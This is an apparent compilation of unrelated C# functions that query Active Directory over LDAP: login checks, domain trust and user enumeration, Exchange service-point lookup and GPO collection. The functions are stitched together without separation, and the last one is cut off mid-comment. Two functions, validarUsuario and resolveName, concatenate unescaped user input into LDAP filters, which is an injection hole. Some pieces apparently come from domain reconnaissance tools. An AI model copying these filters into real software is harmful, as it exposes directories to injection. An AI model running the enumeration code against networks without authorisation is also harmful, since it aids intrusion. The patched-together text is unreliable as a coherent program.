public string validarUsuario(string usuario, string clave, string dominio) { string rpta = ""; DirectoryEntry domain = new DirectoryEntry(dominio); //DirectoryEntry domain = new DirectoryEntry("LDAP://" + dominio); using (DirectorySearcher Searcher = new DirectorySearcher(dominio)) { //Searcher.Filter = "(&(objectCategory=user)(ANR=" + usuario + " * ))"; // busca todas las cuentas que se parezcan Searcher.Filter = "(SAMAccountName=" + usuario + ")"; // "(SAMAccountName=" & usuario & ")"; // filtra por usuario especifico Searcher.SearchScope = SearchScope.Subtree; // Start at the top and keep drilling down Searcher.PropertiesToLoad.Add("sAMAccountName"); // Load User ID Searcher.PropertiesToLoad.Add("displayName"); // Load Display Name Searcher.PropertiesToLoad.Add("givenName"); // Load Users first name Searcher.PropertiesToLoad.Add("sn"); // Load Users last name Searcher.PropertiesToLoad.Add("distinguishedName"); // Users Distinguished name Searcher.PropertiesToLoad.Add("proxyAddresses"); // correo del usuario Searcher.PropertiesToLoad.Add("department"); // area de trabajo Searcher.PropertiesToLoad.Add("title"); // rol del usuario Searcher.PropertiesToLoad.Add("userAccountControl"); // Users Distinguished name Searcher.Sort.PropertyName = "sAMAccountName"; // Sort by user ID Searcher.Sort.Direction = System.DirectoryServices.SortDirection.Ascending; // A-Zt) using (var users = Searcher.FindAll()) // Users contains our searh results { if (users.Count > 0) { foreach (SearchResult User in users) // goes throug each user in the search resultsg { //Ambito._estCuentaUsuario = Convert.ToInt32(User.Properties["userAccountControl"][0]); //int flagExists = Ambito._estCuentaUsuario & 0x2; //if (flagExists > 0) //{ // rpta = "La cuenta de usuario se encuentra deshabilitada"; //} System.DirectoryServices.DirectoryEntry Entry = new System.DirectoryServices.DirectoryEntry("LDAP://" + dominio, usuario, clave); System.DirectoryServices.DirectorySearcher valSearcher = new System.DirectoryServices.DirectorySearcher(Entry); valSearcher.SearchScope = System.DirectoryServices.SearchScope.OneLevel; try { System.DirectoryServices.SearchResult Results = valSearcher.FindOne(); } catch (Exception ex) { rpta = ex.Message; return(rpta); } //if (User.Properties.Contains("displayName")) //{ // Ambito._NombreUsuario = System.Convert.ToString(User.Properties["displayName"][0]); //} //if (User.Properties.Contains("title")) //{ // Ambito._rolUsuario = System.Convert.ToString(User.Properties["title"][0]); //} //if (User.Properties.Contains("title")) //{ // Ambito._dptoUsuario = System.Convert.ToString(User.Properties["title"][0]); //} //if (User.Properties.Contains("proxyAddresses")) //{ // Ambito._correoUsuario = System.Convert.ToString(User.Properties["proxyAddresses"][0]); //} //if (User.Properties.Contains("sAMAccountName")) //{ // Ambito.Usuario = System.Convert.ToString(User.Properties["sAMAccountName"][0]).ToUpper(); //} rpta = "OK"; } } else { rpta = "ER"; } } } return(rpta); }
public TrustRelationshipInformationCollection GetAllTrustRelationships() { if (trustCollection == null) { try { DirectoryEntry rootDse = new DirectoryEntry(string.Format("LDAP://{0}/RootDSE", dName), dc.UserName, dc.Password); string defaultName = rootDse.DirContext.DefaultNamingContext; if (defaultName == null || defaultName == "") { trustCollection = null; return trustCollection; } DirectoryEntry sys = new DirectoryEntry(string.Format("LDAP://{0}/CN=System,{1}", SDSUtils.DNToDomainName(defaultName), defaultName), dc.UserName, dc.Password); DirectorySearcher ds = new DirectorySearcher(sys); ds.Filter = "(objectClass=trustedDomain)"; ds.SearchScope = SearchScope.Subtree; SearchResultCollection src = ds.FindAll(); if (src != null && src.Count > 0) { trustCollection = new TrustRelationshipInformationCollection(); foreach (SearchResult sr in src) { string sProtocol, sServer, sCNs, sDCs; SDSUtils.CrackPath(sr.Path, out sProtocol, out sServer, out sCNs, out sDCs); /*Console.WriteLine("sProtocol " + sProtocol); Console.WriteLine("sServer " + sServer); Console.WriteLine("sCNs " + sCNs); Console.WriteLine("sDCs " + sDCs);*/ string sourcename, targetname; TrustDirection trustdirection; TrustType trusttype = TrustType.Unknown; DirectoryEntry trustEntry = new DirectoryEntry(sr.Path, dc.UserName, dc.Password); int trustdir = (int)trustEntry.Properties["trustDirection"].Value; string trustDn = trustEntry.Properties["distinguishedName"].Value.ToString(); string[] splits = trustDn.Split(','); trustDn = splits[0].Substring(3); int trustattr = (int)trustEntry.Properties["trustAttributes"].Value; int trusttp = (int)trustEntry.Properties["trustType"].Value; //Note:the following implementation of how to determine the TrustType is still under investigation if (trusttp == (int)ADTrustType.TYPE_UPLEVEL) //windows 2003 trust { switch (trustattr) { case 0: trusttype = TrustType.External; //this trust is non-transitive break; case 1: //ATTRIBUTES_NON_TRANSITIVE break; case 2: //ATTRIBUTES_UPLEVEL_ONLY break; case 4: //ATTRIBUTES_QUARANTINED_DOMAIN trusttype = TrustType.External; break; case 8: //ATTRIBUTES_FOREST_TRANSITIVE trusttype = TrustType.Forest; //and this trust is transitive break; case 16: //ATTRIBUTES_CROSS_ORGANIZATION trusttype = TrustType.CrossLink; break; case 32://ATTRIBUTES_WITHIN_FOREST if (trustDn.ToLower().Contains(dName.ToLower())) trusttype = TrustType.ParentChild; else trusttype = TrustType.External; //this trust is non-transitive break; case 64: //ATTRIBUTES_TREAT_AS_EXTERNAL trusttype = TrustType.External; break; default: trusttype = TrustType.Unknown; break; } } else if (trusttp == (int)ADTrustType.TYPE_MIT) trusttype = TrustType.Kerberos; switch (trustdir) { case 1: trustdirection = TrustDirection.Inbound; sourcename = dName; targetname = trustDn; break; case 2: trustdirection = TrustDirection.Outbound; sourcename = trustDn; targetname = dName; break; case 3: trustdirection = TrustDirection.Bidirectional; sourcename = dName; targetname = trustDn; break; default: trustdirection = TrustDirection.Disabled; sourcename = targetname = ""; break; } TrustRelationshipInformation trustinfo = new TrustRelationshipInformation(sourcename, targetname, trusttype, trustdirection); trustCollection.Add(trustinfo); } } } catch { return null; } } return trustCollection; }
private ADObject resolveName(string name) { name = name.Trim(); DirectoryEntry root = Utility.NewDirectoryEntry("LDAP://" + SqlAzManStorage.RootDSEPath); DirectorySearcher deSearch = new DirectorySearcher(root); //Try find exactly if (this.adObjectType == ADObjectType.UsersOnly || this.adObjectType == ADObjectType.OneUserOnly) { deSearch.Filter = String.Format("(&(|(displayName={0})(samaccountname={0})(userprincipalname={0})(objectSid={0}))(&(objectClass=user)(objectCategory=person)))", name); } else if (this.adObjectType == ADObjectType.UsersAndGroups) { deSearch.Filter = String.Format("(&(|(displayName={0})(samaccountname={0})(userprincipalname={0})(objectSid={0}))(|(&(objectClass=user)(objectCategory=person))(objectClass=group)))", name); } SearchResultCollection results = deSearch.FindAll(); ADObject ado = new ADObject(); try { //Try find exactly if (results.Count == 1) { DirectoryEntry de = results[0].GetDirectoryEntry(); ado.Name = (string)de.InvokeGet("samaccountname"); ado.ADSPath = de.Path; ado.UPN = (string)de.InvokeGet("userPrincipalName"); ado.internalSid = new SecurityIdentifier((byte[])de.Properties["objectSid"][0], 0); ado.state = ADObjectState.Resolved; return(ado); } //Then try find with jolly (*) if (this.adObjectType == ADObjectType.UsersOnly || this.adObjectType == ADObjectType.OneUserOnly) { deSearch.Filter = String.Format("(&(|(displayName=*{0}*)(samaccountname=*{0}*)(userprincipalname=*{0}*))(&(objectClass=user)(objectCategory=person)))", name); } else if (this.adObjectType == ADObjectType.UsersAndGroups) { deSearch.Filter = String.Format("(&(|(displayName=*{0}*)(samaccountname=*{0}*)(userprincipalname=*{0}*))(|(&(objectClass=user)(objectCategory=person))(objectClass=group)))", name); } results = deSearch.FindAll(); if (results.Count == 0) { //Check for Well Know Sid try { NTAccount nta = new NTAccount(name); SecurityIdentifier sid = (SecurityIdentifier)nta.Translate(typeof(SecurityIdentifier)); nta = (NTAccount)sid.Translate(typeof(NTAccount)); ado.Name = nta.Value; ado.ADSPath = String.Format("LDAP://<SID={0}>", sid.Value); ado.UPN = nta.Value; ado.internalSid = sid; ado.state = ADObjectState.Resolved; return(ado); } catch { } ado.Name = name; ado.state = ADObjectState.NotFound; return(ado); } else { List <ADObject> proposedADObjects = new List <ADObject>(); foreach (SearchResult sr in results) { DirectoryEntry de = sr.GetDirectoryEntry(); ADObject proposal = new ADObject(); proposal.Name = (string)de.InvokeGet("samaccountname"); proposal.ADSPath = de.Path; proposal.ClassName = de.SchemaClassName; proposal.UPN = (string)de.InvokeGet("userPrincipalName"); proposal.internalSid = new SecurityIdentifier((byte[])de.Properties["objectSid"][0], 0); proposedADObjects.Add(proposal); this.Session["proposedADObjects"] = proposedADObjects; } ado.Name = name; ado.state = ADObjectState.Multiple; return(ado); } } catch { return(ado); } }
public static DataTable LookForUserInAllDomains(string sLastNameSearch, string sFirstNameSearch) { if (sUID == "") sUID = null; if (sPwd == "") sPwd = null; CreateNetworkUserTable(); objTable.Rows.Clear(); ////Search in all the domains //string ldapdomains = System.Configuration.ConfigurationManager.AppSettings["LDAPDomains"].ToString(); //string[] Domains = ldapdomains.Split(new char[] { ';' }); //for (int i = 0; i < Domains.Length; i++) //{ // string domainName = Domains[i]; // objTable = LookForUserInDomain(domainName, sLastNameSearch, sFirstNameSearch); //} string sFilter = String.Format("(|(&(objectClass=User)(givenname={0})(sn={1})))", sFirstNameSearch, sLastNameSearch); // collect inactive users in all the domains string[] sDomains = sLDAPDomains.Split(new char[] { ';' }); for (int i = 0; i < sDomains.Length; i++ ) { string sDomainName = sDomains[ i ]; string sServerName = System.Configuration.ConfigurationManager.AppSettings[sDomainName].ToString(); string sLDAPPath = "LDAP://" + sServerName + "/DC=" + sDomainName + ",DC=root01,DC=org"; DirectoryEntry objRootDE = new DirectoryEntry(sLDAPPath, sUID, sPwd, AuthenticationTypes.Secure); DirectorySearcher objDS = new DirectorySearcher(objRootDE); objDS.Filter = sFilter; objDS.ReferralChasing = ReferralChasingOption.None; objDS.PropertiesToLoad.Add("userAccountControl"); objDS.PropertiesToLoad.Add("SAMAccountName"); objDS.PropertiesToLoad.Add("givenName"); objDS.PropertiesToLoad.Add("sn"); objDS.PropertiesToLoad.Add("TelephoneNumber"); objDS.PropertiesToLoad.Add("mail"); SearchResultCollection objSRC = null; try { objSRC = objDS.FindAll(); } catch (Exception excpt) { if (excpt.Message.IndexOf("The server is not operational.") < 0) throw; } if (objSRC == null) continue; foreach (SearchResult objSR in objSRC) { int iInactiveFlag = Convert.ToInt32(objSR.Properties["userAccountControl"][0]); string sUserId = objSR.Properties["SAMAccountName"][0].ToString(); string sFirstName = objSR.Properties["givenName"][0].ToString(); string sLastName = objSR.Properties["sn"][0].ToString(); string sPhone = ""; string sEmail = ""; if (objSR.Properties["TelephoneNumber"].Count > 0) sPhone = objSR.Properties["TelephoneNumber"][0].ToString(); if( objSR.Properties["mail"].Count > 0 ) sEmail = objSR.Properties["mail"][0].ToString(); iInactiveFlag = iInactiveFlag & 0x0002; if (iInactiveFlag <= 0) { // add name, username, phone and email to the table, if active DataRow objRow = objTable.NewRow(); objRow["LastName"] = sLastName; objRow["FirstName"] = sFirstName; objRow["Username"] = sUserId; objRow["UserDomain"] = sDomainName; objRow["Phone"] = sPhone; objRow["Email"] = sEmail; objTable.Rows.Add( objRow ); continue; } } objSRC.Dispose(); objDS.Dispose(); objRootDE.Close(); objRootDE.Dispose(); } return objTable; }
public void SearchByFiter(string qFilter, int sizeLimit) { DirectorySearcher searcher = new DirectorySearcher(this.directoryEntry) { PageSize = int.MaxValue, Filter = qFilter, SizeLimit = sizeLimit }; Console.WriteLine($"[*] Query: {searcher.Filter}\n"); try { SearchResultCollection result = null; if (Config.Directory.Attrs.Count != 0 && Config.Directory.Attrs.First().Equals("meta", StringComparison.OrdinalIgnoreCase)) { var resultOne = searcher.FindOne(); if (resultOne != null) { foreach (var p in resultOne.Properties.PropertyNames) { Console.WriteLine($"{p}"); } } return; } result = searcher.FindAll(); if (result != null) { foreach (SearchResult sr in result) { Console.WriteLine($"{sr.Path}"); foreach (DictionaryEntry p in sr.Properties) { foreach (var d in p.Value as ResultPropertyValueCollection) { if (Config.Directory.Attrs.Count != 0) { if (Config.Directory.Attrs.Any(s => s.Equals(p.Key.ToString(), StringComparison.OrdinalIgnoreCase))) { printAttribute(p.Key.ToString(), d); } } else { printAttribute(p.Key.ToString(), d); } } } } } }catch (Exception e) { Console.WriteLine($"Filter failed: {e.Message}"); } }
private static void EnumerateUsers(DomainInformation root, DirectoryEntry directory) { foreach (DirectoryEntry child in directory.Children) { if (child.SchemaClassName == "organizationalUnit" || child.SchemaClassName == "container" || child.SchemaClassName == "user") { DirectorySearcher mySearcher = new DirectorySearcher(child) { Filter = "((&(objectCategory=Person)(objectClass=User)))" }; if (mySearcher.FindAll().Count != 0 || child.SchemaClassName == "user") { switch (child.SchemaClassName) { case "organizationalUnit": { var item = new DomainInformation() { Type = DomainInformationTypeEnum.OrganizationUnit, Name = child.Name.Replace("OU=", ""), Description = child.Properties["description"].Value != null ? child.Properties["description"].Value.ToString() : string.Empty }; if (root.Childrens.Where(x => x.Name == item.Name && x.Description == item.Description).Count() == 0) { root.Childrens.Add(item); EnumerateUsers(item, child); } break; } case "container": { var item = new DomainInformation() { Type = DomainInformationTypeEnum.OrganizationUnit, Name = child.Name.Replace("CN=", ""), Description = child.Properties["description"].Value != null ? child.Properties["description"].Value.ToString() : string.Empty }; if (root.Childrens.Where(x => x.Name == item.Name && x.Description == item.Description).Count() == 0) { root.Childrens.Add(item); EnumerateUsers(item, child); } break; } case "user": { var item = new DomainInformation() { Type = DomainInformationTypeEnum.User, Name = child.Name.Replace("CN=", ""), Description = child.Properties["description"].Value != null ? child.Properties["description"].Value.ToString() : string.Empty, Info = ParseUserInfo(child) }; if (root.Childrens.Where(x => x.Name == item.Name && x.Description == item.Description).Count() == 0) { root.Childrens.Add(item); } break; } } } else { continue; } } else { continue; } } }
private List <string> PopulatAuxObjectList(string auxClassName) { string value; List <string> strs; string userName; string password; string str; string password1; try { string str1 = string.Concat("LDAP://", this.userSuppliedServerName, "/rootDSE"); if (this.credentials == null) { userName = null; } else { userName = this.credentials.UserName; } if (this.credentials == null) { password = null; } else { password = this.credentials.Password; } using (DirectoryEntry directoryEntry = new DirectoryEntry(str1, userName, password, this.authTypes)) { if (directoryEntry.Properties["schemaNamingContext"].Count != 0) { value = (string)directoryEntry.Properties["schemaNamingContext"].Value; } else { throw new PrincipalOperationException(StringResources.ADAMStoreUnableToPopulateSchemaList); } } string str2 = string.Concat("LDAP://", this.userSuppliedServerName, "/", value); if (this.credentials == null) { str = null; } else { str = this.credentials.UserName; } if (this.credentials == null) { password1 = null; } else { password1 = this.credentials.Password; } using (DirectoryEntry directoryEntry1 = new DirectoryEntry(str2, str, password1, this.authTypes)) { using (DirectorySearcher directorySearcher = new DirectorySearcher(directoryEntry1)) { directorySearcher.Filter = string.Concat("(&(objectClass=classSchema)(systemAuxiliaryClass=", auxClassName, "))"); directorySearcher.PropertiesToLoad.Add("ldapDisplayName"); List <string> strs1 = new List <string>(); SearchResultCollection searchResultCollections = directorySearcher.FindAll(); using (searchResultCollections) { foreach (SearchResult searchResult in searchResultCollections) { if (searchResult.Properties["ldapDisplayName"] != null) { strs1.Add(searchResult.Properties["ldapDisplayName"][0].ToString()); } else { throw new PrincipalOperationException(StringResources.ADAMStoreUnableToPopulateSchemaList); } } } strs1.Add(auxClassName); strs = strs1; } } } catch (COMException cOMException1) { COMException cOMException = cOMException1; throw ExceptionHelper.GetExceptionFromCOMException(cOMException); } return(strs); }
private void TestLookup(string ldapPath, string ldapFilter, string userName, SecureString password, bool findOne) { Dispatcher.BeginInvoke(DispatcherPriority.Background, new Action(() => { tbLdap.Background = new SolidColorBrush(Colors.LightGoldenrodYellow); })); var de = new DirectoryEntry(ldapPath.ToUpper()); if (userName == String.Empty) { de.AuthenticationType = AuthenticationTypes.Secure; } else { IntPtr bstr = Marshal.SecureStringToBSTR(password); de.Username = userName; de.Password = Marshal.PtrToStringBSTR(bstr); Marshal.FreeBSTR(bstr); de.AuthenticationType = AuthenticationTypes.Secure; } var ds = new DirectorySearcher(de) { Filter = ldapFilter, SearchScope = SearchScope.Subtree, PageSize = 1000 }; try { if (findOne) { SearchResult sr = ds.FindOne(); de = sr.GetDirectoryEntry(); Dispatcher.BeginInvoke(DispatcherPriority.Background, new Action(() => { tbLdap.Text = tbLdap.Text + de.Name + Environment.NewLine + de.Path + "\r\n"; })); } else { SearchResultCollection rsc = ds.FindAll(); foreach (SearchResult sr in rsc) { SearchResult sr1 = sr; Dispatcher.BeginInvoke(DispatcherPriority.Background, new Action(() => { tbLdap.Text = tbLdap.Text + sr1.Path + "\r\n"; })); } } } catch (Exception ex) { Dispatcher.BeginInvoke(DispatcherPriority.Background, new Action(() => { tbLdap.Text = tbLdap.Text + ex.Message + "\r\n"; })); } finally { Dispatcher.BeginInvoke(DispatcherPriority.Background, new Action(() => { tbLdap.Background = new SolidColorBrush(Colors.Azure); })); } }
private string DoAdLookups(bool bDoPosts) { string sRet = string.Empty; bool bFail = false; string sMailbox = txtTargetMailbox.Text.Trim(); StringBuilder oSB = new StringBuilder(); DirectoryEntry oRootDSE = null; DirectoryEntry oQuery = null; DirectorySearcher oDirectorySearcher = null; SearchResultCollection oSearchResultCollection = null; //string scpUrl = null; //const string ScpUrlGuidString = @"77378F46-2C66-4aa9-A6A6-3E7A48B19596"; this.Cursor = Cursors.WaitCursor; oSB.AppendFormat("- DoAdLookups - Find SCP records: {0}\r\n", DateTime.Now); //string sPostUrl = "https://autodiscover-s.outlook.com/autodiscover/autodiscover.svc"; // #1 Get AD entries try { oSB.AppendFormat(" Start inital binding to LDAP://rootDSE\r\n"); oRootDSE = new DirectoryEntry("LDAP://rootDSE"); oSB.AppendFormat(" Finished binding to LDAP://rootDSE\r\n"); oSB.AppendFormat(" Obtaining configurationNamingContext - if it fails then Autodiscover should be used.\r\n"); string ConfigurationNamingContext = (string)oRootDSE.Properties["configurationNamingContext"].Value; oSB.AppendFormat(" configurationNamingContext {0}\r\n", ConfigurationNamingContext); string sQuery = "LDAP://" + ConfigurationNamingContext; oSB.AppendFormat(" Query: {0}\r\n", sQuery); string sFilter = "(&(objectcategory=serviceConnectionPoint)(|(keywords=67661D7F-8FC4-4fa7-BFAC-E1D7794C1F68)( keywords=77378F46-2C66-4aa9-A6A6-3E7A48B19596)))"; oSB.AppendFormat(" Filter: {0}\r\n", sFilter); oQuery = new DirectoryEntry(sQuery); oDirectorySearcher = new DirectorySearcher(oQuery); oDirectorySearcher.PropertiesToLoad.Add("cn"); oDirectorySearcher.PropertiesToLoad.Add("name"); oDirectorySearcher.PropertiesToLoad.Add("serviceBindingInformation"); oDirectorySearcher.PropertiesToLoad.Add("legacyExchangeDN"); oDirectorySearcher.PropertiesToLoad.Add("Domain"); oDirectorySearcher.PropertiesToLoad.Add("site"); oDirectorySearcher.PropertiesToLoad.Add("keywords"); oDirectorySearcher.Filter = sFilter; oSB.AppendFormat("\r\n"); oSB.AppendFormat("+ Searching AD for CAS URLs: {0}\r\n", DateTime.Now); DateTime oStart = DateTime.Now; oSearchResultCollection = oDirectorySearcher.FindAll(); TimeSpan oTimeSpan = DateTime.Now.Subtract(oStart); oSB.AppendFormat(" Time to do Search: {0} miliseconds\r\n", oTimeSpan.TotalMilliseconds.ToString()); oSB.AppendFormat("- Searching AD for CAS URLs: {0}\r\n", DateTime.Now); } catch (System.Runtime.InteropServices.COMException) { bFail = true; System.Runtime.InteropServices.COMException COMExceptionEx = new System.Runtime.InteropServices.COMException(); Console.WriteLine(COMExceptionEx.Message); oSB.AppendFormat("!! Error: "); oSB.AppendFormat(" Message: {0}\r\n", COMExceptionEx.Message); oSB.AppendFormat(" InnerException: {0}\r\n", COMExceptionEx.InnerException); oSB.AppendFormat(""); oSB.AppendFormat(" StackTrace: {0}\r\n", COMExceptionEx.StackTrace); oSB.AppendFormat("- Searching: {0}\r\n", DateTime.Now); } catch (InvalidOperationException) { bFail = true; InvalidOperationException InvOpEx = new InvalidOperationException(); Console.WriteLine(InvOpEx.Message); oSB.AppendFormat("!! Error: "); oSB.AppendFormat(" Message: {0}\r\n", InvOpEx.Message); oSB.AppendFormat(" InnerException: {0}\r\n", InvOpEx.InnerException); oSB.AppendFormat(""); oSB.AppendFormat(" StackTrace: {0}\r\n", InvOpEx.StackTrace); oSB.AppendFormat("- Searching: {0}\r\n", DateTime.Now); } catch (NotSupportedException) { bFail = true; NotSupportedException NotSuppEx = new NotSupportedException(); Console.WriteLine(NotSuppEx.Message); oSB.AppendFormat("!! Error: "); oSB.AppendFormat(" Message: {0}\r\n", NotSuppEx.Message); oSB.AppendFormat(" InnerException: {0}\r\n", NotSuppEx.InnerException); oSB.AppendFormat(""); oSB.AppendFormat(" StackTrace: {0}\r\n", NotSuppEx.StackTrace); oSB.AppendFormat("- Searching: {0}\r\n", DateTime.Now); } catch (Exception ex) { bFail = true; Console.WriteLine(ex.Message); oSB.AppendFormat("!! Error: "); oSB.AppendFormat(" Message: {0}\r\n", ex.Message); oSB.AppendFormat(" InnerException: {0}\r\n", ex.InnerException); oSB.AppendFormat(""); oSB.AppendFormat(" StackTrace: {0}\r\n", ex.StackTrace); oSB.AppendFormat("- Searching: {0}\r\n", DateTime.Now); } System.DirectoryServices.ActiveDirectory.ActiveDirectorySite site = System.DirectoryServices.ActiveDirectory.ActiveDirectorySite.GetComputerSite(); string computerSiteName = site.Name; oSB.AppendFormat("Site Name: " + computerSiteName + "\r\n"); if (bFail != true) { oSB.AppendFormat("\r\n"); oSB.AppendFormat(" Results found: {0} URLs\r\n", oSearchResultCollection.Count.ToString()); oSB.AppendFormat("+ List Results: {0}\r\n", DateTime.Now); oSB.AppendFormat("\r\n"); string sUrl = string.Empty; try { foreach (SearchResult oSearchResult in oSearchResultCollection) { oSB.AppendFormat(" Result Path: {0}\r\n", oSearchResult.Path); if (oSearchResult.Properties["cn"].Count != 0) { oSB.AppendFormat(" cn: {0}\r\n", oSearchResult.Properties["cn"][0].ToString()); } if (oSearchResult.Properties["name"].Count != 0) { oSB.AppendFormat(" name: {0}\r\n", oSearchResult.Properties["name"][0].ToString()); } if (oSearchResult.Properties["serviceBindingInformation"].Count != 0) { oSB.AppendFormat(" serviceBindingInformation: {0}\r\n", oSearchResult.Properties["serviceBindingInformation"][0].ToString()); } if (oSearchResult.Properties["legacyExchangeDN"].Count != 0) { oSB.AppendFormat(" legacyExchangeDN: {0}\r\n", oSearchResult.Properties["legacyExchangeDN"][0].ToString()); } if (oSearchResult.Properties["Domain"].Count != 0) { oSB.AppendFormat(" Domain: {0}\r\n", oSearchResult.Properties["Domain"][0].ToString()); } if (oSearchResult.Properties["site"].Count != 0) { oSB.AppendFormat(" site: {0}\r\n", oSearchResult.Properties["site"][0].ToString()); } //if (oSearchResult.Properties["keywords"].Count != 0) //{ // if (!string.IsNullOrEmpty(computerSiteName)) // { // // Search for SCP entries. // string sitePrefix = "Site="; // string siteMatch = sitePrefix + computerSiteName; // System.Collections.Generic.List<string> scpListNoSiteMatch = new System.Collections.Generic.List<string>(); // System.DirectoryServices.ResultPropertyValueCollection entryKeywords = oSearchResult.Properties["keywords"]; // // Identify SCP URLs. // if (AppHelpers.CollectionHelpers.CollectionContains(entryKeywords, ScpUrlGuidString)) // { // // Get the SCP URL. // scpUrl = oSearchResult.Properties["serviceBindingInformation"][0] as string; // // If the SCP URL matches the exact ComputerSiteName. // if (CollectionHelpers.CollectionContains(entryKeywords, siteMatch)) // { // // Priority 1 SCP URL. Add SCP URL to the list if it's not already there. // oSB.Append(" Priority 1 type. SCP URL matches the exact ComputerSiteName. Top of the list.\r\n"); // oSB.Append(" Path: " + oSearchResult.Path + " \r\n"); // oSB.Append(" SCP URL: " + scpUrl + "\r\n"); // //scpUrlList.Add(scpUrl); // } // } // // No match between the SCP URL and the ComputerSiteName // else // { // bool hasSiteKeyword = false; // // Check if SCP URL entry has any keyword starting with "Site=" // foreach (string keyword in entryKeywords) // { // hasSiteKeyword |= keyword.StartsWith(sitePrefix, System.StringComparison.InvariantCultureIgnoreCase); // } // // Add SCP URL to the scpListNoSiteMatch list if it's not already there. // if (!CollectionHelpers.CollectionContains(scpListNoSiteMatch, scpUrl)) // { // // Priority 2 SCP URL. SCP entry doesn't have any "Site=<otherSite>" keywords, insert at the top of list. // if (!hasSiteKeyword) // { // oSB.Append(" Priority 2 type. SCP entry doesn't have any \"Site=<otherSite>\" keywords\r\n"); // oSB.Append(" Path: " + oSearchResult.Path + " \r\n"); // oSB.Append(" SCP URL: " + scpUrl + "\r\n"); // scpListNoSiteMatch.Insert(0, scpUrl); // } // // Priority 3 SCP URL. SCP entry has at least one "Site=<otherSite>" keyword, add to the end of list. // else // { // oSB.Append(" Priority 3 type. SCP entry has at least one \"Site=<otherSite>\" keyword. This should be at the end of the list.\r\n"); // oSB.Append(" Path: " + oSearchResult.Path + " \r\n"); // oSB.Append(" SCP URL: " + scpUrl + "\r\n"); // scpListNoSiteMatch.Insert(0, scpUrl); // } // } // } // } //} int iTimeoutSeconds = Int32.Parse(cmboTimeout.Text.Trim()); if (bDoPosts == true) { oSB.Append("\r\n"); sUrl = oSearchResult.Properties["serviceBindingInformation"][0].ToString(); if (sUrl.StartsWith("LDAP:")) { oSB.AppendFormat(" ! Skipping POST due to URL starting with LDAP\r\n"); } else { oSB.Append(DoPostToUrl(sUrl, sMailbox, iTimeoutSeconds)); } } oSB.AppendFormat("\r\n"); oSB.AppendFormat("--------\r\n"); oSB.AppendFormat("\r\n"); } oSB.AppendFormat("- List Results: {0}\r\n", DateTime.Now); } catch (System.Runtime.InteropServices.COMException) { bFail = true; System.Runtime.InteropServices.COMException COMExceptionEx = new System.Runtime.InteropServices.COMException(); Console.WriteLine(COMExceptionEx); oSB.AppendFormat("!! Error"); oSB.AppendFormat(" Message: {0}\r\n", COMExceptionEx.Message); oSB.AppendFormat(" InnerException: {0}\r\n", COMExceptionEx.InnerException); oSB.AppendFormat("\r\n"); oSB.AppendFormat(" StackTrace: {0}\r\n", COMExceptionEx.StackTrace); oSB.AppendFormat("- List Results: {0}\r\n", DateTime.Now); } catch (InvalidOperationException) { bFail = true; InvalidOperationException InvOpEx = new InvalidOperationException(); Console.WriteLine(InvOpEx.Message); oSB.AppendFormat("!! Error"); oSB.AppendFormat(" Message: {0}\r\n", InvOpEx.Message); oSB.AppendFormat(" InnerException: {0}\r\n", InvOpEx.InnerException); oSB.AppendFormat("\r\n"); oSB.AppendFormat(" StackTrace: {0}\r\n", InvOpEx.StackTrace); oSB.AppendFormat("- List Results: {0}\r\n", DateTime.Now); } catch (NotSupportedException) { bFail = true; NotSupportedException NotSuppEx = new NotSupportedException(); Console.WriteLine(NotSuppEx.Message); oSB.AppendFormat("!! Error"); oSB.AppendFormat(" Message: {0}\r\n", NotSuppEx.Message); oSB.AppendFormat(" InnerException: {0}\r\n", NotSuppEx.InnerException); oSB.AppendFormat("\r\n"); oSB.AppendFormat(" StackTrace: {0}\r\n", NotSuppEx.StackTrace); oSB.AppendFormat("- List Results: {0}\r\n", DateTime.Now); } } oSB.AppendFormat(""); oSB.AppendFormat("- DoAdLookups - Find SCP records: {0}\r\n", DateTime.Now); sRet = oSB.ToString(); this.Cursor = Cursors.Default; return(sRet); // #2 Do test posts. // //[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true } }
public static JObject GetDomainGpos() { try { DirectoryEntry rootDse = new DirectoryEntry(); DirectoryEntry root = new DirectoryEntry(); DirectoryEntry rootExtRightsContext = new DirectoryEntry(); if (GlobalVar.UserDefinedDomainDn != null) { rootDse = new DirectoryEntry(("LDAP://" + GlobalVar.UserDefinedDomain + "/rootDSE"), GlobalVar.UserDefinedUsername, GlobalVar.UserDefinedPassword); root = new DirectoryEntry(("GC://" + rootDse.Properties["defaultNamingContext"].Value), GlobalVar.UserDefinedUsername, GlobalVar.UserDefinedPassword); string schemaContextString = rootDse.Properties["schemaNamingContext"].Value.ToString(); rootExtRightsContext = new DirectoryEntry("LDAP://" + schemaContextString.Replace("Schema", "Extended-Rights"), GlobalVar.UserDefinedUsername, GlobalVar.UserDefinedPassword); } else { rootDse = new DirectoryEntry("LDAP://rootDSE"); root = new DirectoryEntry("GC://" + rootDse.Properties["defaultNamingContext"].Value); string schemaContextString = rootDse.Properties["schemaNamingContext"].Value.ToString(); rootExtRightsContext = new DirectoryEntry("LDAP://" + schemaContextString.Replace("Schema", "Extended-Rights")); } // make a searcher to find GPOs DirectorySearcher gpoSearcher = new DirectorySearcher(root) { Filter = "(objectClass=groupPolicyContainer)", SecurityMasks = SecurityMasks.Dacl | SecurityMasks.Owner }; SearchResultCollection gpoSearchResults = gpoSearcher.FindAll(); /* * // stolen from prashant - grabbing guids for extended rights * Dictionary<string, string> guidDict = new Dictionary<string, string> * { * {"00000000-0000-0000-0000-000000000000", "All"} * }; * * // and again where we grab all the Extended Rights * DirectorySearcher rightsSearcher = new DirectorySearcher(rootExtRightsContext) * { * Filter = "(objectClass=controlAccessRight)", * PropertiesToLoad = {"name", "rightsGUID"} * }; * * SearchResultCollection extRightsResultCollection = rightsSearcher.FindAll(); * * foreach (SearchResult extRightsResult in extRightsResultCollection) * { * string extRightGuidString = extRightsResult.Properties["rightsguid"][0].ToString(); * string extRightNameString = extRightsResult.Properties["name"][0].ToString(); * // for some reason we hit a single duplicate in this lot. nfi what that's about. TODO - figure that out. * try * { * guidDict.Add(extRightGuidString, extRightNameString); * } * catch (System.ArgumentException) * { * if (GlobalVar.DebugMode) * { * Utility.DebugWrite("Hit a duplicate GUID in extRightsResult"); * } * } * }*/ // new dictionary for data from each GPO to go into JObject gposData = new JObject(); foreach (SearchResult gpoSearchResult in gpoSearchResults) { // object for all data for this one gpo JObject gpoData = new JObject(); DirectoryEntry gpoDe = gpoSearchResult.GetDirectoryEntry(); // get some useful attributes of the gpo string gpoDispName = gpoDe.Properties["displayName"].Value.ToString(); gpoData.Add("Display Name", gpoDispName); string gpoUid = gpoDe.Properties["name"].Value.ToString(); // this is 